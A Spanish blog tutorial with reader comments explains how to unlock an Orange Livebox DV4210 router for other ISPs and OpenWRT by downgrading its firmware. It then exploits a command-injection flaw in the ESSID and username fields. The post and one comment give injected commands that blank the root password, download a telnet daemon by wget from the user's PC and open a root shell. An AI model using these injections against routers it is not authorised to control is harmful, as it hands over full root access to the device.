nov
24
2009

OpenWRT en Inventel Livebox DV4210 (Parte 1/3) – Liberación


1. EL LIVEBOX

Como ya sabreis, Orange distribuye el router Livebox bloqueado para que no se pueda usar con otros proveedores de internet. El bloqueo es a 2 niveles.

  1. Solo acepta conexiones PPPoE o PPPoA (las que ofrece Orange).
  2. Solo permite nombres de usuario del tipo xxx@orangeadsl, xxx@wanadooadsl y similares. Por tanto, no podremos configurarlo para usarlo con otro ISP.

Al desbloquearlo conseguimos 2 cosas:

  1. Que nos permitirá seleccionar cualquier tipo de conexión: PPPoA, PPPoE, DHCP + NAT, RFC1483, bridge.
  2. Un aumento del rendimiento global en las velocidades de subida y bajada.

2. QUE NECESITAREMOS

Para desbloquear el router vamos a necesitar los siguientes elementos:

  1. Estar familiarizado en el manejo del router, asignación de IPs privadas, etc…
  2. Un PC.
  3. Un cable USB.
  4. El CD de configuración del Livebox. Si no lo tienes, puedes bajarlo desde aquí.
  5. Un servidor FTP que debemos instalar en nuestro PC. En nuestro caso, usamos el Serv-U, que es un servidor FTP muy sencillo de instalar y configurar.
  6. Un servidor de telnet, utelnetd.
  7. Una utilidad para convertir el código que nos devuelve el router (solo para liberarlo).
  8. Unos 15 minutos de tiempo.

3. ¿EN QUE SE BASA EL DESBLOQUEO?

El desbloqueo se basa en una vulnerabilidad de los Firmwares antiguos que nos permite introducir comandos desde la configuración del ESSID. Lo que haremos es instalar en el router un servidor de telnet que nos permitirá ejecutar comandos en el router y que nos proporcione el código de desbloqueo del router. Una vez desbloqueado, tendremos acceso a todas las opciones del router sin ningún tipo de limitación impuesta por Orange.

4. EL DOWNGRADE

La vulnerabilidad de la inyección de comandos desde la ventana ESSID se corrigió en los últimos Firmwares. Por tanto, lo primero que debemos hacer es hacer un downgrade del firmware del router, es decir, pasar a una versión anterior que tenga la vulnerabilidad. Para ello vamos a bajarnos el Firmware adecuado desde aquí y lo guardamos en nuestro PC.

Antes de desactualizar el Firmware vamos a asignar una IP fija a nuestro PC. En nuestro caso será 192.168.1.2 y la del router será 192.168.1.1.

Conectamos el Livebox y el PC usando el cable USB. Instalamos el software de configuración que viene en el CD (que puedes encontrar en este mismo post en el punto 2). Una vez finalizado, vemos que tenemos una utilidad que se llama “configuración de fábrica USB”.

Una vez pulsado, nos aparece una ventana donde hemos de seleccionar el Firmware que vamos a instalar en el router.

A partir de aquí el proceso se completa como una actualización normal de firmware.

Una vez completado el proceso, tendremos el Firmware vulnerable listo.

5. EL SERVIDOR DE TELNET

El Utelnetd lo renombraremos por comodidad a “u”. Lo podemos descargar desde su página o bien lo puedes descargar ya renombrado a “u” desde aquí.

Guardamos el fichero en un directorio.

6. EL SERVIDOR FTP

Ahora vamos a instalar el Serv-U en nuestro PC. La instalación no tiene ningún misterio y solo debemos estar atentos en que debemos permitir el acceso anónimo y poner como raíz del FTP el directorio donde hemos guardado el fichero “u”.

7. INYECCIÓN DE COMANDOS

Para inyectar los comandos y evitar errores os recomiendo que hagais un “copiar y pegar” de los comandos.

Entramos en el router (admin/admin) y vamos a la pantalla de usuario conexión y en el nombre de usuario ponemos:


;echo root::0:0:root:/root:/bin/sh >/etc/passwd

Con ello le quitamos la contraseña de root al router.

Luego en Configuración->Avanzada->Inalámbrico, cambia el ESSID a:


;cd /etc;wget ftp://192.168.1.2/u

Pulsamos en “Enviar” y luego en “Aplicar”. Pasado unos instantes, el router se reinicia solo.

Con ello lo que hacemos es decirle al router que se conecte por FTP a nuestro PC y se descargue el fichero “u”. Si tu PC usa otra IP solo tienes que sustituir 192.168.1.2 por la IP privada de tu PC.

Ahora, volvemos a cambiar el ESSID y ponemos:


;chmod 777 /etc/u

Con esta acción damos permisos de ejecución al fichero “u”.

Por último, volvemos a cambiar el ESSID a:


;/etc/u -p 23 -l /bin/sh -d

Una vez más pulsamos en “Enviar” y luego en “Aplicar”. El router se volverá a reiniciar.

8. CONECTAR POR TELNET

Si hemos realizado todos los pasos de manera correcta, podremos conectar via Telnet con nuestro router. Abrimos una ventana de comandos y tecleamos “telnet 192.168.1.1″ y nos aparecerá el Busybox.

Ahora debemos ejecutar lo siguiente en el telnet:

redboot_fconfig_get –parameter h235_key /dev/mtd4

Nos devolverá una clave hexadecimal. La copiamos y la introducimos en esta página web http://www.agp.dsl.pipex.com/h235tounlock.html. Tambien podemos bajar estos archivos a nuestro ordenador y hacerlo en local.

Nos devolverá la clave ya convertida lista para desbloquear el router.

Por último, solo queda acceder por HTTP al router e ir a la página http://192.168.1.1/brdgoff.html pegar el código de desbloqueo proporcionado por la página y ya tendremos el router liberado para cualquier operador y con un firmware sin restricciones.

Una vez reiniciado el router, vemos como lo podremos configurar para cualquier ISP.


Ya tenemos nuestro router Livebox liberado (no necesario para cargar OpenWRT) y con acceso Telnet.

En el siguiente post explicare como cargar el firmware OpenWRT en nuestro LiveBox. Este OpenWRT es una version en desarrollo, por lo que todas las funcionaliadades del router (por ejemplo, la conexion ADSL) no estaran disponibles y no se si lo estarán en un futuro.

Fuente: ADSLZone.net

Compartir
Written by Javier Rodriguez in: Linux,Redes | Etiquetas: , , , ,

9 comentarios »

  • cbg

    hay varias partes que fallan en el tutorial. La inyección de comandos no me funciono tal y como lo explicas. Así es menos engorroso y me funciono bien pones “;echo root::0:0:root:/root:/bin/sh >/etc/passwd ;cd /etc;wget ftp://192.168.1.2/u ;chmod 777 /etc/u” en el nombre de usuario, luego cuando se reinicia de nuevo en el nombre de usuario ;/etc/u -p 23 -l /bin/sh -d nada de cambiar el ESSID. Otra parte que no me funciono es la linea del telnet que falta un guion antes de parameter son dos en vez de uno como tienes puesto aunque eso creo que es un error de la autocorreción del blog o algo así redboot_fconfig_get –parameter h235_key /dev/mtd4

    Comment | 9 de enero de 2012
  • cbg

    efectivamente es un error del blog puse dos guiones antes de parameter y solo aparece uno.

    Comment | 9 de enero de 2012
  • alfmanda

    una vez con acceso livebox (“busybox”) por telnet. Se podría montar un servidor samba o nfs? qué modulos son necesarios descargar. Mi idea es, una vez montamos un pendrive usb en fat, habilitar la compartición en red de sus archivos, para eso es necesario montar un servidor samba en nuestro livebox

    Comment | 6 de marzo de 2012
  • Lo que quieres hacer se puede hacer, pero para ello te hace falta meter OpenWRT, ya que lo que pides entiendo yo, que quieres meter las aplicaciones necesarias al firm del Livebox para que haga de servidor samba, pero el problema no es solo ese, sino tambien lo modulos necesarios para el Kernel.

    Instalando OpenWRT, previamente habiendolo compilado con soporte para samba, puedes obterner lo que necesitas. Doy fe de ello porque lo instale en su dia y funcionaba.

    Comment | 6 de marzo de 2012
  • victor

    Yo no tengo el CD de instalación, he probado de descargarmelo e instalarlo en un WindowsXP. Al extraerlo y ejecutarlo me da el error que dice: No supported OS. Que sistema operativo tienes instalado? Cual seria la solución?

    Comment | 9 de mayo de 2012
  • victor

    Nada, solucionado… Lo que pasaba era que le daba al setup desde el archivo comprimido. Error mio. Seguiré tu blog y diré algo al respeto

    Comment | 9 de mayo de 2012
  • Eternal

    Hola, primero quisiera saber si este procedimiento sirve para el “Sagemcom LiveBox 2 R SP” de Orange y luego si fuera asi como se conecta con USB, porque trae dos puertos USB pero son para unidades de almacenamiento.

    Salu2.

    Comment | 14 de mayo de 2012
  • Hola! javi puedes auydarme por favor. como puedo cambiar el firmware de LIVEBOX 2 con OpenWRT , los pasos , o un manual. gracias

    un saludo.

    Comment | 27 de mayo de 2013
  • El livebox2 tiene hardware distinto del livebox normal. Busca en la pagina de OpenWrt.org a ver si han desarrollado algo, ya que no estoy al tanto de como van los desarrollos para Livebox2 o incluso si los hay…

    Comment | 5 de julio de 2013

RSS feed for comments on this post. TrackBack URL

Deja un comentario

Theme: TheBuckmaker.com Blog Themes | Hostpapa customer, Berlin